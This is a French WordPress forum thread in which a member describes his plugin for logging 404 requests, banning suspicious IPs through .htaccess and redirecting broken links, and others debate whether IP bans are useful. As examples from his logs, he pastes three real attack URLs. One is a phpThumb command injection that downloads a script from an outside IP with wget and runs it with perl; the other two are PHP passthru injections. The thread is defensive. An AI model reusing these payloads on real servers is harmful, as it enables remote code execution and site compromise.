WordPress Francophone

merci de poster dans "support de WordPress" comme indiqué pour cette rubrique "Pas de support"

avez vous eu ces thèmes ?

Dernière modification par rvzen (07-01-2012 13:28:15)

Ce n'est pas un support que je recherche, mais une simple discussion sur ce sujet

rvzen a écrit:

merci de poster dans "support de WordPress" comme indiqué pour cette rubrique "Pas de support"

avez vous eu ces thèmes ?

Heureusement que Wordpress a toujours été bien sécurisé.

WordPress est très régulièrement mis à jour ce qui n'est pas forcément le cas des thèmes. Thèmes et extensions peuvent également présenter des vulnérabilités.

Vu la convivialité lors du lancement du sujet de discussion sur le forum,
je n'ai pas envie de répondre.

Jusque maintenant j'ai toujours réussi à tout faire seul.

Bye l'ami.

Dans un message ci-dessus j'avais indiqué:

Ayant mon propre plugin, il faut voir toutes les requêtes que certaines adresses IP opèrent.

Donc cela fonctionne avec n'importe quel thème

Le problème soulevé était une discussion à propos de la sécurisation de Wordpress.

Il n'y a aucun de ces thèmes présents sur mes blogs.

C'est pour cela que je viens à estimer que cela tend à tester des failles de sécurité.

Voici d'autres requêtes...

.../common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9

.../img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;

.../awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d

etc... etc...

J'ai tout ce qu'il faut "à la maison"

Le sujet de la discussion que je viens d'ouvrir, était de dire qu'en se basant sur certains mots-clé
trouvés dans la redirection 404, l'idée était de récupérer l'adresse IP de ces "hackers".

En fonction de ces mots-clé, la personne est "bannie" à partir de mon HTACCESS qui est généré automatiquement.

Si la requête récupérée est un lien rompu de mon blog, cela me permet de faire une redirection 301
sur la bonne page recherche ou éventuellement une autre approchante.

Et les moteurs de recherche sont contents (lol)

C'est un plugin que j'ai développé.

Cela tient donc plus du "support" que de la simple conversation comme tu me l'a si bien répété au départ.

surtout que je pensais à tous les membres en posant cette question et non à moi.
ce n'est pas au bout de 15 ans de création de sites que je vais me prendre la tête avec ça.

Je n'ai toujours pas compris, le plugin est terminé et fonctionnel ou encore à l'état de projet?

Pour ce qui est des attaques, il y a évidement des robots qui scannent plus ou moins automatiquement à la recherche d’éventuelles failles connues dans les sites. Je me demande si il est pertinent de bannir une IP en sachant que cette IP a toute chance d'être temporaire.
Tu vas risquer de faire grossir inutilement ton .htaccess sans réel bénéfice, de plus, un utilisateur lambda qui a le malheur de se tromper d'adresse sera lui aussi banni?

Merci à FGE pour cette pertinente remarque sur le fait que tous ces mêmes thèmes venaient d'un même site.

Le fait de bien gérer le htaccess n'est pas synonyme de surcharge.
Les adresses IP sont toujours étrangères. J'ai vite fait de débannir ces adresses voire remettre à zéro ma table.

Au départ, j'ai créé ce plugin car mon premier blog a déjà quelques années de vécu.
Il a été maintes fois remanier et les pages également.

Donc l'idée était de gérer mes erreurs 404 dynamiquement sinon cela aurait surcharger mon htaccess.

Visiblement pour l'instant GG n'a pas l'air de désapprécier, bien au contraire.

Sinon mon plugin est auto-installable, mais est-ce qu'il est réellement utile en l'état ?

Dernière modification par Bryan (08-01-2012 17:36:14)

Sinon, les principales fonctionnalités de ce plugin sont de :
- gérer un mode maintenance avec une page d'accueil personnalisable
- d'autoriser/interdire le hotlinking
- de bloquer certains robots indésirables
- de bloquer les pseudo-hackers
- de détecter les liens rompus de mon blog
- de rediriger les liens morts en mode dynamique
- de gérer la table des liens de redirection
- de gérer la table de la blacklist
Un problème que je n'arrive pas résoudre, c'est qu'il ne me fait pas encore le café

Dernière modification par Bryan (12-01-2012 20:51:02)